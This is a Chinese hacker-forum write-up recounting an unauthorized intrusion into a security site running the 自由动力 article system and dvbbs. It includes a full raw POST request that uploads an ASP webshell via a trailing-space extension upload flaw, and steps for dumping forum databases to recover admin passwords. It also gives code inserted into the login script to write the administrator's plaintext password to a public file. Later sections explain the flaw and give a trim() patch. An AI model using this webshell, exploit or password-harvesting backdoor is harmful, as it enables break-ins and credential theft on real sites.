我是这样进入一个黑客站点的

文章来源：邪恶八进制 中国
文章作者：恶猫[E.S.T] (EvilCat[E.S.T])

    最近放假在家，没什么事，上网的时间多了，今天在平时喜欢去的几个安全站点转了转，站点上新的好的文章都给大家转到E.S.T的论坛上了（嘻嘻）。闲着也是闲着，干脆在这些站点的友情连接的站点看看，说不定又什么新的东西那。
    好了，就进这个友情连接的站点看看吧。恩，网站的美工做的不错，看了看文章，没有什么太新的东西。刚要离开这个站点，发现这个站点的页面系统很熟悉，像是动力的文章系统，呵呵，看看页面的最底部写着“Powered by：FP3.6 Sp2”晕～～果真被我猜中，是自由动力文章系统。站点上还有一个dvbbs7.0sp2。出于职业毛病，我对这个站点产生了兴趣•••••••呵呵，在自由动力的文章系统里注册一个帐号看看。我进入用户控制面板中的文章管理看了看，我不说大家也应该知道我想干什么了••••••上传，呵呵。看看上传软件的位置写着“对不起，本站不允许上传”，也是作为一个黑客站点上传漏洞怎么可能有呢。我记得我在黑客x档案增刊上发过一篇《突破封锁动力文章上传漏洞再利用》的文章，文章说明了在禁止注册用户的情况下，我们还是可以用post攻击的方式上传asp木马的。在这种情况下也是这种攻击方式是不是有效那？恩，试试就知道了。我先提交这个页面http://www.xxx.com/upload_soft.asp页面返回“对不起，本网站不允许上传文件!”我们再提交” http://www.xxx.com/upfile_soft.asp
页面返回” 请先选择你要上传的文件！”哈哈，这说明可以用NC提交数据报进行post攻击了，post的内容当然是asp木马了，从现在看，成功的几率也只有50％因为对方要是修补了上传漏洞，即使post过去肯定也是说，文件格式不对。我找了个以前自己利用自由动力上传漏洞的数据包改了改，然后用nc提交过去，嘻嘻，上传成功了.关于数据报的修改和上传漏洞的利用办法我想我就不必在和大家说一遍了，大家应该很熟练了。
下面给出post过去的数据报：



Code:
POST /Upfile_Soft.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: [url]http://www.xxx.com/upload_soft.asp[/url] Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d531c25440a0c Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322) Host: [url]www.xxx.com[/url] Content-Length: 1497 Connection: Keep-Alive Cache-Control: no-cache Cookie:ASPSESSIONIDQSCQSADA=ICEEJPHALJLEBHKFIOJDPLOD; 831225=CookieDate=1&Password=635d6ca36de2ff6f&UserLevel=999&UserName=cat; -----------------------------7d531c25440a0c Content-Disposition: form-data; name="FileName"; filename="C:/Documents and Settings/e.cat/桌面/注入/mm.asp .rar" Content-Type: text/plain <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%> <%if Trim(request("syfdpath"))<>"" then%> <%fdata = request("cyfddata")%> <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%> <%objCountFile.Write fdata%> <%if err =0 then%> <%response.write "<font color=red>save Success!</font>"%> <%else%> <%response.write "<font color=red>Save UnSuccess!</font>"%> <%end if%> <%err.clear%> <%end if%> <%objCountFile.Close%> <%Set objCountFile=Nothing%> <%Set objFSO = Nothing%> <%Response.write "<form action='''' method=post>"%> <%Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:/web/x.asp):</font>"%> <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%> <%Response.Write "<br>"%> <%Response.write "本文件绝对路径"%> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%> <%Response.write "<br>"%> <%Response.write "输入马的内容:"%> <%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%> <%Response.write "<input type=submit value=保存>"%> <%Response.write "</form>"%> -----------------------------7d531c25440a0c Content-Disposition: form-data; name="Submit" 上传 -----------------------------7d531c25440a0c—
[Ctrl+A Select All]


用提交过去的木马再写入个海洋2005进去，看看网站的目录是什么样子的，权限锁得很死，
只能在网站目录浏览，cmd命令一个也执行不了，晕••••••不管那么多了，刚才不是还看到一个dvbbs7.0sp2吗，先把数据库下载下来看看。下载下来后用数据库辅助浏览器看看，在论坛的页面上可以看出XXXX是论坛的管理员，在数据库的DV_User，表和DV_Admin表中可以看出论坛的前台和后台的用户名和密码都是不一样的，然后再用数据库浏览器看看DV_Log表中content字段，关键字password，查看一下是否有明文的管理员密码，呵呵，果真密码出来了是xxxxxx008，从前台的DV_User表中看出用名是前台管理员名字是xxxx和后台的管理员名字后面也差了一个008，估计前台的密吗是不是和后台就差那么一个008那，我用md5转换器验证了一下我的猜测，呵呵，又被我猜中了，看来黑客也是需要运气的哈哈。好了dvbbs的前台和后台的密码都知道了，以后aspshell要是丢了用管理员的密码进去一样可以backup a shell的。下面再把自由动力的数据库下来看看，自由动力的数据库的admin表中的管理员密码的md5值和动网的不一样，看来管理员还是有一些安全意识的。我自己猜测了几个，这回没那么好运了，没又猜出来。不过没关系，我还有办法得到他的密码的，分析一下自由动力的源码，可以看出，密码的验证是靠Admin_ChkLogin.asp这个文件，我们接着往下分析。文件的部分代码如下：


Code:
username=replace(trim(request("username")),"'","") password=replace(trim(Request("password")),"'","") CheckCode=replace(trim(Request("CheckCode")),"'","") if UserName="" then     FoundErr=True     ErrMsg=ErrMsg & "<br><li>用户名不能为空！</li>" end if if Password="" then     FoundErr=True     ErrMsg=ErrMsg & "<br><li>密码不能为空！</li>" end if if CheckCode="" then     FoundErr=True     ErrMsg=ErrMsg & "<br><li>验证码不能为空！</li>" end if if session("CheckCode")="" then     FoundErr=True     ErrMsg=ErrMsg & "<br><li>你登录时间过长，请重新返回登录页面进行登录。</li>" end if if CheckCode<>CStr(session("CheckCode")) then     FoundErr=True     ErrMsg=ErrMsg & "<br><li>您输入的确认码和系统产生的不一致，请重新输入。</li>" end if if FoundErr<>True then     password=md5(password)     sql="select * from admin where password='"&password&"' and username='"&username&"'"     set rs=nt2003.execute(sql)     if rs.bof and rs.eof then         FoundErr=True         ErrMsg=ErrMsg & "<br><li>用户名或密码错误！！！</li>"     else         if password<>rs("password") then               FoundErr=True               ErrMsg=ErrMsg & "<br><li>用户名或密码错误！！！</li>"         else                 nt2003.execute("update Admin set LastLoginIP='"&Request.ServerVariables("REMOTE_ADDR")&"',LastLoginTime='"&now&"',LoginTimes=LoginTimes+1 Where username='"&username&"'")               session.Timeout=Clng(nt2003.site_setting(15))               session("AdminName")=username               rs.close               set rs=nothing               Response.Redirect "Admin_Index.asp"         end if     end if     rs.close     set rs=nothing end if if FoundErr=True then     call WriteErrMsg() end if
[Ctrl+A Select All]




可以看出一些基本的错误要是没有找到既FoundErr<>True，程序就会将用户输入的密码转换成md5然后交给数据库去查询。好到此为止，我们将这段代码


Code:
Dim fsoObject Dim tsObject Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") Set tsObject = fsoObject.CreateTextFile(Server.MapPath("cat.txt"))tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing
[Ctrl+A Select All]


插入到


Code:
if password<>rs("password") then FoundErr=True ErrMsg=ErrMsg & "<br><li>用户名或密码错误！！！</li>" else
[Ctrl+A Select All]


的下面，作用管理员一旦登陆，就回将管理员的密码写入到cat.txt。我们浏http://www.xxx.com/cat.txt管理员的密码就一栏无余了，呵呵。这个思路虽不是我的原创但是把这个方法用在自由动力上还是第一呀。其实，有朋友回说webshell都有了为什么我对用户的密码还是这么感兴趣，嘿嘿，管理员的qq和e-mail乃至他的ftp等等个人隐私的东西要是和其中的一个密码一样••••••••不过大家可不要这么干呀，我只是做个试验••••••所以大家的密码最好不要用一样的。好了入侵暂且告一段落，提升权限是以后的事，我想给大家分析一下为什么自由动力的文章系统我们可以进行post攻击。
 

这次成功的原因是两方面造成，一是自由动力程序存才post攻击的可能，二是程序存在上传漏洞。从根本上说还是上传漏洞。
下面是对与第一个问题的分析：
我们开始提交这个页面http://www.xxx.com/upload_soft.asp时，返回
“对不起，本网站不允许上传文件!”
我们来看upload_soft.asp的部分源码：


Code:
<% if nt2003.site_setting(7)=1 then %> <form action="Upfile_Soft.asp" method="post" name="form1" onSubmit="return check()" enctype="multipart/form-data"> <input name="FileName" type="FILE" class="tx1" size="40"> <input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt"> </form> <% else     response.write "对不起，本网站不允许上传文件！" end if %>
[Ctrl+A Select All]


我们注意到if nt2003.site_setting(7)=1那么就会出现上传的表单。
我们提交http://www.xxx.com/upfile_soft.asp
页面返回” 请先选择你要上传的文件！”
我们看看upfile_soft.asp的部分源码：


Code:
<% nt2003.GetSite_Setting() const upload_type=0   '上传方法：0=无惧无组件上传类，1=FSO上传 2=lyfupload，3=aspupload，4=chinaaspupload const SaveUpFilesPath="UploadSoft" const UpFileType="rar|zip|exe|mpg|rm|wav|mid" nt2003.site_setting(7)=1     ‘注意这里！！！！ const MaxFileSize=102400 ••••••••••••• sub upload_0()   '使用化境无组件上传类     set upload=new upfile_class ''建立上传对象     upload.GetData(104857600)   '取得上传数据,限制最大上传100M     if upload.err > 0 then '如果出错         select case upload.err               case 1                   response.write "请先选择你要上传的文件！"               case 2                   response.write "你上传的文件总大小超出了最大限制（100M）"         end select         response.end     end if
[Ctrl+A Select All]



直接访问upfile_soft.asp就会提示我们选择上传文件，这样我们post过去文件不就ok了。
而且自由动力在用户上传的时候并不检查用户的cookie，这点很危险。这个方面bbsgood就做的很好，虽然bbsgood存在上传漏洞但是，但是官方网站没有开放上传功能并且没有被黑，就是因为bbsgood在用户上传时是检查用户的cookie中的内容的，比如bbsgood在UpLoad_ID.ASP中有一段是这么写的：


Code:
username=Request.Cookies("username") password=Request.Cookies("password") if Request.Cookies("login")="Y" and ImageID>0 then   Set rs=conn.execute("select top 1 id,用户名,密码,权限,帐号状态 from BBSGood_User where 用户名='"&username&"' ")   if (rs.bof and rs.eof) or rs("密码")<>password then     Response.Write i+1 &"、你没有上传权限<br>"   else     if (ImageID=1 and (rs("权限")="admin" or rs("权限")="bbsadmin")) or (ImageID=2 and rs("权限")="admin") or (ImageID=3 and rs("权限")="bbsadmin") or ImageID=4 then         filename = SaveFile(FormFieldName, filePath, maxfilesize, SavType, FsoType, ForbidType)     '保存并取得文件名     else         Response.Write i+1 &"、你没有上传权限<br>"     end if   end if end if
[Ctrl+A Select All]


呵呵，要不是这段代码我想发现上传漏洞时官方网站就已经被黑了••••••


下面是第二个问题的分析：
我想上传漏洞大家都不陌生，分析漏洞原因的文章很多的，我这里还是再说一下原因，asp (后面有空格)是不等于asp的，而对于windows对于碰到有空格的他会自动去掉空格，所以当我们上传一个asp 文件就会变成一个asp文件。可是我发现网上关于上传漏洞的修补的文章真是少之又少，我在google中搜了半天竟然没有找到，晕。利用上传漏洞进去的肉鸡不把漏洞补上怎么成那，一般的做法都是删除文件什么的，这么做实在是不好。其实关于漏洞的修补我们可以用trim这个函数，下面是trim函数在MSDN中的说明：
Trim function
Returns a copy of a string without leading spaces (LTrim), trailing spaces (RTrim), or both leading and trailing spaces (Trim).
LTrim(string)
RTrim(string)
Trim(string)
The string argument is any valid string expression. If string contains Null, Null is returned.
Remarks
The following example uses the LTrim, RTrim, and Trim functions to trim leading spaces, trailing spaces, and both leading and trailing spaces, respectively:
Dim MyVar
MyVar = LTrim("   vbscript ")   ' MyVar contains "vbscript ".
MyVar = RTrim("   vbscript ")   ' MyVar contains "   vbscript".
MyVar = Trim("   vbscript ")   ' MyVar contains "vbscript".

我们知道自由动力使用的是无惧上传类，引用具有上传漏洞的upfile_class.asp中的部分代码:


Code:
oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "/")+1) oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "/")) oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
[Ctrl+A Select All]


看到了吧，并没有过滤空格，我们可以用trim函数这样修补：


Code:
oFileInfo.FileName = trim(Mid (sFileName,InStrRev (sFileName, "/")+1)) oFileInfo.FilePath = trim(Left (sFileName,InStrRev (sFileName, "/"))) oFileInfo.FileExt = trim(Mid (sFileName,InStrRev (sFileName, ".")+1))
[Ctrl+A Select All]


    恩这就好多了，关于动网的上传漏洞大家可以对比一下，以前的动网坛的upfile.asp和现在的upfile.asp就明白应该怎样修补了。
    好的问题也分析完了，看看这个站长的e-mail给他发个邮件告诉他，他的网站存在上传漏洞，并且已经给他修补了，网站的后门已经全部清楚，文章管理员的密码和bbs的密码记得改。呵呵，这次入侵从中学到一些东西就够了，何必要改人家的主页来炫耀自己呢，这种提升国内网络安全的方法不是很好吗？做个好孩子••••••••••